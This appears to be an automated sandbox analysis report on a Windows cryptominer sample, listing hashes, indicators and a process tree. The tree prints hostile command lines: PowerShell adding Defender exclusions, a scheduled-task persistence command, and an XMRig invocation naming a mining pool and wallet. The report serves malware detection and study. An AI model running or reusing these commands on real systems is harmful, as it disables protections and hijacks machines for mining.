Analysis
- max time kernel: 145s
- max time network: 148s
- platform: windows10-1703_x64
- resource: win10-20220812-en
- resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 07-11-2022 11:35
- Static task: static1
General
- Target: 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe
- Size: 3.0MB
- MD5: c766d0165cf4337e52985a58b03f2a91
- SHA1: 85a82f096757f309d47fa64f5cb7ab2faaff158b
- SHA256: 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06
- SHA512: 59c98c7a647302f1e9aa4c2a645068ec9766082262f7e5e04b6c7b3f7ff842ef37655861bb92035b9ef498a97c7924a20c4e4c5148922fe1849d3d55aa8162c5
- SSDEEP: 49152:tBiD61h+tHbmYIm7oOIBJJFgNEe0GkOL1F6eQ+hdAwUXuQgVS/:GDGtzmNEejzS/
Malware Config
Signatures
XMRig Miner payload (5 IoCs)
resource / yara_rule:
- behavioral1/memory/1668-202-0x0000000140000000-0x00000001407C9000-memory.dmp (xmrig)
- behavioral1/memory/1668-203-0x0000000140343234-mapping.dmp (xmrig)
- behavioral1/memory/1668-204-0x0000000140000000-0x00000001407C9000-memory.dmp (xmrig)
- behavioral1/memory/1668-205-0x0000000140000000-0x00000001407C9000-memory.dmp (xmrig)
- behavioral1/memory/1668-207-0x0000000140000000-0x00000001407C9000-memory.dmp (xmrig)
Executes dropped EXE (1 IoC)
- PID 5088: AVPTQBAEW.exe
Uses the VBS compiler for execution (1 TTP)
Suspicious use of SetThreadContext (1 IoC)
- PID 5088 (AVPTQBAEW.exe) set thread context of PID 1668 (procid_target 80)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 3180: schtasks.exe
Delays execution with timeout.exe (1 IoC)
- PID 5064: timeout.exe
Suspicious behavior: EnumeratesProcesses (7 IoCs)
- PID 992: powershell.exe (listed 3 times)
- PID 4324: powershell.exe (listed 3 times)
- PID 5088: AVPTQBAEW.exe
Suspicious behavior: LoadsDriver (1 IoC)
- PID 620: Process not Found
Suspicious use of AdjustPrivilegeToken (48 IoCs)
description pid Process Token: SeDebugPrivilege 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeIncreaseQuotaPrivilege 992 powershell.exe Token: SeSecurityPrivilege 992 powershell.exe Token: SeTakeOwnershipPrivilege 992 powershell.exe Token: SeLoadDriverPrivilege 992 powershell.exe Token: SeSystemProfilePrivilege 992 powershell.exe Token: SeSystemtimePrivilege 992 powershell.exe Token: SeProfSingleProcessPrivilege 992 powershell.exe Token: SeIncBasePriorityPrivilege 992 powershell.exe Token: SeCreatePagefilePrivilege 992 powershell.exe Token: SeBackupPrivilege 992 powershell.exe Token: SeRestorePrivilege 992 powershell.exe Token: SeShutdownPrivilege 992 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeSystemEnvironmentPrivilege 992 powershell.exe Token: SeRemoteShutdownPrivilege 992 powershell.exe Token: SeUndockPrivilege 992 powershell.exe Token: SeManageVolumePrivilege 992 powershell.exe Token: 33 992 powershell.exe Token: 34 992 powershell.exe Token: 35 992 powershell.exe Token: 36 992 powershell.exe Token: SeDebugPrivilege 5088 AVPTQBAEW.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 powershell.exe Token: SeSecurityPrivilege 4324 powershell.exe Token: SeTakeOwnershipPrivilege 4324 powershell.exe Token: SeLoadDriverPrivilege 4324 powershell.exe Token: SeSystemProfilePrivilege 4324 powershell.exe Token: SeSystemtimePrivilege 4324 powershell.exe Token: SeProfSingleProcessPrivilege 4324 powershell.exe Token: SeIncBasePriorityPrivilege 4324 powershell.exe Token: SeCreatePagefilePrivilege 4324 powershell.exe Token: SeBackupPrivilege 4324 powershell.exe Token: SeRestorePrivilege 4324 powershell.exe Token: SeShutdownPrivilege 4324 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeSystemEnvironmentPrivilege 4324 powershell.exe Token: SeRemoteShutdownPrivilege 4324 powershell.exe Token: SeUndockPrivilege 4324 
powershell.exe Token: SeManageVolumePrivilege 4324 powershell.exe Token: 33 4324 powershell.exe Token: 34 4324 powershell.exe Token: 35 4324 powershell.exe Token: 36 4324 powershell.exe Token: SeLockMemoryPrivilege 1668 vbc.exe Token: SeLockMemoryPrivilege 1668 vbc.exe -
Suspicious use of FindShellTrayWindow (1 IoC)
- PID 1668: vbc.exe
Suspicious use of WriteProcessMemory (28 IoCs)
description pid Process procid_target PID 4952 wrote to memory of 992 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 67 PID 4952 wrote to memory of 992 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 67 PID 4952 wrote to memory of 4968 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 69 PID 4952 wrote to memory of 4968 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 69 PID 4968 wrote to memory of 5064 4968 cmd.exe 71 PID 4968 wrote to memory of 5064 4968 cmd.exe 71 PID 4968 wrote to memory of 5088 4968 cmd.exe 73 PID 4968 wrote to memory of 5088 4968 cmd.exe 73 PID 5088 wrote to memory of 4324 5088 AVPTQBAEW.exe 74 PID 5088 wrote to memory of 4324 5088 AVPTQBAEW.exe 74 PID 5088 wrote to memory of 4540 5088 AVPTQBAEW.exe 76 PID 5088 wrote to memory of 4540 5088 AVPTQBAEW.exe 76 PID 4540 wrote to memory of 3180 4540 cmd.exe 78 PID 4540 wrote to memory of 3180 4540 cmd.exe 78 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80
Processes
- C:\Users\Admin\AppData\Local\Temp\1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe (PID 4952)
  Command line: "C:\Users\Admin\AppData\Local\Temp\1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe"
  Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 992)
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 4968)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8189.tmp.bat""
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\timeout.exe (PID 5064)
      Command line: timeout 3
      Signatures: Delays execution with timeout.exe
    - C:\ProgramData\WindowsMail\AVPTQBAEW.exe (PID 5088)
      Command line: "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
      Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4324)
        Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\cmd.exe (PID 4540)
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe (PID 3180)
          Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
          Signatures: Creates scheduled task(s)
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe (PID 1668)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
        Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 3.0MB
  MD5: c766d0165cf4337e52985a58b03f2a91
  SHA1: 85a82f096757f309d47fa64f5cb7ab2faaff158b
  SHA256: 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06
  SHA512: 59c98c7a647302f1e9aa4c2a645068ec9766082262f7e5e04b6c7b3f7ff842ef37655861bb92035b9ef498a97c7924a20c4e4c5148922fe1849d3d55aa8162c5
- Filesize: 3KB
  MD5: ad5cd538ca58cb28ede39c108acb5785
  SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
- Filesize: 1KB
  MD5: 2f98ffbecf3ccf4e5fe8c8f889c9ab51
  SHA1: dcd55850425c3b10dc9149979722772821b4a19c
  SHA256: 875e5437c29eb6b8583bb3ff5d4fbbc029a1fe4913eccf26720ffff0d0f0334b
  SHA512: 7d0e14ae83731633b15d30b071cc64fcd10d3a5e3af3cb77d1b803a1bc66fefef9183279f67058b73aadcd111ec13cb49d52b04aba9b9b20b36154171ce49d5f
- Filesize: 149B
  MD5: cfd4bf22f7c04fd192562e4ae64ebcb5
  SHA1: 173a384f96e1938989b9f919f086f37e0de6ba5f
  SHA256: ff854806c6bbc7ce5d1abe77aa9bc17a550b37be1e04421360a7d65e5ea6b5f6
  SHA512: c6b042408e2818308aa70d7209bc427bbf58a6b1f46be3226ac8c5cda0d52b79d33522fb8d83c4923e6cdb306b154d7dbef15669d087ff5de95093e4fff8b223